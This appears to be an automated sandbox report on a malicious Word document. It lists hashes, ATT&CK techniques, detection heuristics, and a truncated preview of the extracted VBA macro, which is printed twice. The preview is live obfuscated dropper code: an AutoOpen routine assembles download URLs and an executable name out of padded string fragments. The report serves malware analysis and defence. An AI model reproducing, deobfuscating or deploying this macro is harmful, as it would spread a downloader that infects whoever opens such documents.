Office (OLE) malware analysis — malicious · 9fa1c13118145d2a

MALICIOUS

Office (OLE)

136.5 KB Created: 2018-02-13 11:06:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 9b338f431aa7dec40e718cca1a3d7389 SHA-1: 07aafd0a1dde076d01437fa2ffb8efceb62867bf SHA-256: 9fa1c13118145d2a5457bbf7470e4d1ce46cc76a3b70e1fa3da2948856d172d1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute arbitrary code. The script attempts to construct a URL by concatenating various strings, which is then likely used to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6447691-0' further supports its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6447691-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6447691-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://mybt+ybhVQDNJjYXOwKqVMLqjdD In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29317 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29317 bytes
SHA-256: `348f754fe284eed526687a435718511e8567e26efa098e868cc2b214ef5b663b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "QiDZNiaq" Sub AutoOpen() On Error Resume Next iWiPnPFzm = svqiHNI - Sgn(zAIdawTMnBMf) - (6966736 - Tan(2901888) / 2046191 - ChrW(KsiXOEkPJioOc)) WFmQHiQqF = hvbcEmGhdlwUOj - Sgn(YvPsTwIFkQv) - (5088986 - Tan(3060017) / 5518205 - ChrW(tDFwwbnbjcD)) zKcfCrDii = BzlzZqqLJMq - Sgn(trsO) - (3520445 - Tan(7520094) / 1885361 - ChrW(TjPQzzcEOEX)) Application.Run "NSTWAuVqz", wmihiQSahCvcV ltBsGUwWk = QWQMsRlnnYPVwO - Sgn(hUAcNmw) - (956808 - Tan(7877987) / 1103471 - ChrW(rwmuV)) QYnDMzEGf = RbfHQvnaYzwt - Sgn(LTRbGhan) - (192557 - Tan(8563820) / 653400 - ChrW(wKLFiQtzXUVZhp)) PEXNvZXBc = uXzYEDQibIT - Sgn(bVpjCwzqwst) - (3235289 - Tan(3515665) / 4302758 - ChrW(nzicui)) End Sub Function wmihiQSahCvcV() On Error Resume Next zRnVZEHn = LOh - Sgn(ujHr) - (3267095 - Tan(2908563) / 1486258 - ChrW(CCszXZW)) kWhBVZZ = kcCULcDQYGC - Sgn(jFY) - (3977705 - Tan(721969) / 1411340 - ChrW(JahrPWkjnRp)) ShkmMai = iXKRjMM - Sgn(SfqSKMDiziXtQ) - (7442108 - Tan(2520367) / 1907046 - ChrW(kmw)) XfkCLAB = vGzfHjjk + Mid(hthZIi + "HuRAjldsFjjzk+y'+'bt//www.baybt+ybtbIsKO+sKOze+Izeyybt+ybt-glybt+ybtay'+'bt+ybtsKO+sKOmouybt+ybtIze+Izer.ybt'+'+ybtde/oDVrybt+ybtTu2/Hsybt+ybtb.Split(ySzjsYmEHcOWMKm" + DipKmpDtv, 14, 138) UNkVcSa = wZNTVP - Sgn(jVnWJKqPCESja) - (7713264 - Tan(702455) / 6809301 - ChrW(ZNIEnnjXYY)) GcVzw = idswOrfLPvsY - Sgn(itwZaaa) - (9064550 - Tan(8140696) / 6528055 - ChrW(IHnwhHzklAhYM)) MwnJlqi = ViIrTjh - Sgn(qZtqGwwwusvw) - (8084865 - Tan(1351599) / 750352 - ChrW(iHwHnRzVkFF)) mqIIzEOTwB = wQwjpYjZnoI + Mid(MUdjPhDSBiIuv + "Ndbt+ybtHsybt+ybtb.exHsb+sKO+sK'+'OHssKO+sKObybt+ybteybsKO+sKOt+sKO+sKOybsKO+sZKzHGWEX" + sJA, 4, 75) YntLjCaX = VzmWpqfnGtUAL - Sgn(tXbq) - (2544288 - Tan(8375750) / 7969719 - ChrW(KlRsl)) SmniViDJ = kALjGOTibH - Sgn(ouZGuGBM) - (3819382 - Tan(5700039) / 6725918 - ChrW(AspCLnAE)) pffQYCn = EzDFhnuzpPvUSY - Sgn(PDQiQjRCBbKnRM) - (1452288 - Tan(8286309) / 5158310 - ChrW(bjv)) oYjiqm = RDWwMTRNDqBDm + Mid(FpcNiOiaNMn + "sjCiqlGNIcsKO+sKOEnV:c'+'oMSpEc[4,26,25]-JoINIzOKSupJwsl" + BYcXGArGj, 8, 40) jUPaSStKHG = BtCDMJRmoNWb - Sgn(YZzUEOK) - (9382949 - Tan(9698354) / 3924210 - ChrW(pSidzpSn)) aACGw = fqtFTJizAIoHv - Sgn(ELiEPDjrCY) - (6061926 - Tan(2582255) / 8850891 - ChrW(opwvjknhjt)) RMJjCPlQlJ = vjL - Sgn(pjPulZROlDjKno) - (4013821 - Tan(5029644) / 1219831 - ChrW(zLKKsY)) uQwqiERNi = AMSHOiOnFi + Mid(smIXVoQ + "VVQYmwtikhTnaDwbWlMbybt+ybt1Eybt+ybtOHybt+yI'+'ze+Izebts'+'b +ybt+ybt ybt+ybtaIze+IzsKO+sKOeEFNSBybtIze+sKO+sKOIze+ybbCo" + wCdXAdlhYURr, 20, 98) wYRJtz = ahiPpsacKnG - Sgn(ojzAZktcTVKok) - (4125854 - Tan(1783765) / 6578017 - ChrW(ZiQC)) mLLDSqN = AfJjkHTiJGZ - Sgn(LChmRzwaTEXu) - (5993693 - Tan(3790907) / 6724011 - ChrW(XlFprFiSrpAlJ)) qrEokjKRdpa = LDOuKGASHiS - Sgn(QvIOEQYaL) - (4689869 - Tan(164961) / 6852976 - ChrW(FUPuczMRitTflJ)) CPDwUPVwrY = tWfoEUUV + Mid(NsQSIFWbMszZz + "cFHIhrEmakzIGWdEiSXLrdBjU+ybtiybt+ybta.comysKO+sKOb'+'t+ybt/aybt+ybtvybt+yb'+'tt2BFybt+ybtL/?ybt+yb'+'thttybt+sKO+sKOybtp://ybIze+Izet+ybtwybt+ECL" + LTtjjAmfnqkrD, 26, 118) TozPOz = GuiMiQhERsP - Sgn(iJFQApEpGjzmRG) - (1410095 - Tan(6921215) / 4144469 - ChrW(QbQASsYSNoEjG)) mFCCnFdWVV = TGbYwYhiCGc - Sgn(vrvcJzjXb) - (7660854 - Tan(6722174) / 6611542 - ChrW(NricQkZaMSKi)) uBTbVJbF = nzMmZKXszj - Sgn(kfHziLjX) - (8708038 - Tan(6551288) / 6872812 - ChrW(zBlVCzjZkz)) isNioUonDU = rEdWXQpmKck + Mid(MiZnDfvEmlX + "dBcYctylandybt+ybtloybt+ybtv'+'e.sKO+sKOcom/GIze+IzeEybt+ybtfWNrr/?hybt+ybttybIze+Izet+ybttybt'+'+ybtp://tybt+ybtosKO+sKUjKvlEkXKwkKfKlsvNPtWrYGp" + jGKhCoiTHw, 6, 115) FAamakWFutO = wijTVoK - Sgn(raHimzMaGVzDak) - (8179040 - Tan(1111020) / 327940 - ChrW(ZEh)) ASaEH = RUiUoCQjuY - Sgn(nwuljVoai) - (8124896 - Tan(7934177) / 5015958 - ChrW(rOrdSSP)) TGwIIjq = SLIm - Sgn(RJJ) - (1776198 - Ta ... (truncated)

SHA-256: 348f754fe284eed526687a435718511e8567e26efa098e868cc2b214ef5b663b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QiDZNiaq"
Sub AutoOpen()
On Error Resume Next
iWiPnPFzm = svqiHNI - Sgn(zAIdawTMnBMf) - (6966736 - Tan(2901888) / 2046191 - ChrW(KsiXOEkPJioOc))
WFmQHiQqF = hvbcEmGhdlwUOj - Sgn(YvPsTwIFkQv) - (5088986 - Tan(3060017) / 5518205 - ChrW(tDFwwbnbjcD))
zKcfCrDii = BzlzZqqLJMq - Sgn(trsO) - (3520445 - Tan(7520094) / 1885361 - ChrW(TjPQzzcEOEX))
Application.Run "NSTWAuVqz", wmihiQSahCvcV
ltBsGUwWk = QWQMsRlnnYPVwO - Sgn(hUAcNmw) - (956808 - Tan(7877987) / 1103471 - ChrW(rwmuV))
QYnDMzEGf = RbfHQvnaYzwt - Sgn(LTRbGhan) - (192557 - Tan(8563820) / 653400 - ChrW(wKLFiQtzXUVZhp))
PEXNvZXBc = uXzYEDQibIT - Sgn(bVpjCwzqwst) - (3235289 - Tan(3515665) / 4302758 - ChrW(nzicui))
End Sub
Function wmihiQSahCvcV()
On Error Resume Next
zRnVZEHn = LOh - Sgn(ujHr) - (3267095 - Tan(2908563) / 1486258 - ChrW(CCszXZW))
kWhBVZZ = kcCULcDQYGC - Sgn(jFY) - (3977705 - Tan(721969) / 1411340 - ChrW(JahrPWkjnRp))
ShkmMai = iXKRjMM - Sgn(SfqSKMDiziXtQ) - (7442108 - Tan(2520367) / 1907046 - ChrW(kmw))
XfkCLAB = vGzfHjjk + Mid(hthZIi + "HuRAjldsFjjzk+y'+'bt//www.baybt+ybtbIsKO+sKOze+Izeyybt+ybt-glybt+ybtay'+'bt+ybtsKO+sKOmouybt+ybtIze+Izer.ybt'+'+ybtde/oDVrybt+ybtTu2/Hsybt+ybtb.Split(ySzjsYmEHcOWMKm" + DipKmpDtv, 14, 138)
UNkVcSa = wZNTVP - Sgn(jVnWJKqPCESja) - (7713264 - Tan(702455) / 6809301 - ChrW(ZNIEnnjXYY))
GcVzw = idswOrfLPvsY - Sgn(itwZaaa) - (9064550 - Tan(8140696) / 6528055 - ChrW(IHnwhHzklAhYM))
MwnJlqi = ViIrTjh - Sgn(qZtqGwwwusvw) - (8084865 - Tan(1351599) / 750352 - ChrW(iHwHnRzVkFF))
mqIIzEOTwB = wQwjpYjZnoI + Mid(MUdjPhDSBiIuv + "Ndbt+ybtHsybt+ybtb.exHsb+sKO+sK'+'OHssKO+sKObybt+ybteybsKO+sKOt+sKO+sKOybsKO+sZKzHGWEX" + sJA, 4, 75)
YntLjCaX = VzmWpqfnGtUAL - Sgn(tXbq) - (2544288 - Tan(8375750) / 7969719 - ChrW(KlRsl))
SmniViDJ = kALjGOTibH - Sgn(ouZGuGBM) - (3819382 - Tan(5700039) / 6725918 - ChrW(AspCLnAE))
pffQYCn = EzDFhnuzpPvUSY - Sgn(PDQiQjRCBbKnRM) - (1452288 - Tan(8286309) / 5158310 - ChrW(bjv))
oYjiqm = RDWwMTRNDqBDm + Mid(FpcNiOiaNMn + "sjCiqlGNIcsKO+sKOEnV:c'+'oMSpEc[4,26,25]-JoINIzOKSupJwsl" + BYcXGArGj, 8, 40)
jUPaSStKHG = BtCDMJRmoNWb - Sgn(YZzUEOK) - (9382949 - Tan(9698354) / 3924210 - ChrW(pSidzpSn))
aACGw = fqtFTJizAIoHv - Sgn(ELiEPDjrCY) - (6061926 - Tan(2582255) / 8850891 - ChrW(opwvjknhjt))
RMJjCPlQlJ = vjL - Sgn(pjPulZROlDjKno) - (4013821 - Tan(5029644) / 1219831 - ChrW(zLKKsY))
uQwqiERNi = AMSHOiOnFi + Mid(smIXVoQ + "VVQYmwtikhTnaDwbWlMbybt+ybt1Eybt+ybtOHybt+yI'+'ze+Izebts'+'b +ybt+ybt ybt+ybtaIze+IzsKO+sKOeEFNSBybtIze+sKO+sKOIze+ybbCo" + wCdXAdlhYURr, 20, 98)
wYRJtz = ahiPpsacKnG - Sgn(ojzAZktcTVKok) - (4125854 - Tan(1783765) / 6578017 - ChrW(ZiQC))
mLLDSqN = AfJjkHTiJGZ - Sgn(LChmRzwaTEXu) - (5993693 - Tan(3790907) / 6724011 - ChrW(XlFprFiSrpAlJ))
qrEokjKRdpa = LDOuKGASHiS - Sgn(QvIOEQYaL) - (4689869 - Tan(164961) / 6852976 - ChrW(FUPuczMRitTflJ))
CPDwUPVwrY = tWfoEUUV + Mid(NsQSIFWbMszZz + "cFHIhrEmakzIGWdEiSXLrdBjU+ybtiybt+ybta.comysKO+sKOb'+'t+ybt/aybt+ybtvybt+yb'+'tt2BFybt+ybtL/?ybt+yb'+'thttybt+sKO+sKOybtp://ybIze+Izet+ybtwybt+ECL" + LTtjjAmfnqkrD, 26, 118)
TozPOz = GuiMiQhERsP - Sgn(iJFQApEpGjzmRG) - (1410095 - Tan(6921215) / 4144469 - ChrW(QbQASsYSNoEjG))
mFCCnFdWVV = TGbYwYhiCGc - Sgn(vrvcJzjXb) - (7660854 - Tan(6722174) / 6611542 - ChrW(NricQkZaMSKi))
uBTbVJbF = nzMmZKXszj - Sgn(kfHziLjX) - (8708038 - Tan(6551288) / 6872812 - ChrW(zBlVCzjZkz))
isNioUonDU = rEdWXQpmKck + Mid(MiZnDfvEmlX + "dBcYctylandybt+ybtloybt+ybtv'+'e.sKO+sKOcom/GIze+IzeEybt+ybtfWNrr/?hybt+ybttybIze+Izet+ybttybt'+'+ybtp://tybt+ybtosKO+sKUjKvlEkXKwkKfKlsvNPtWrYGp" + jGKhCoiTHw, 6, 115)
FAamakWFutO = wijTVoK - Sgn(raHimzMaGVzDak) - (8179040 - Tan(1111020) / 327940 - ChrW(ZEh))
ASaEH = RUiUoCQjuY - Sgn(nwuljVoai) - (8124896 - Tan(7934177) / 5015958 - ChrW(rOrdSSP))
TGwIIjq = SLIm - Sgn(RJJ) - (1776198 - Ta
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.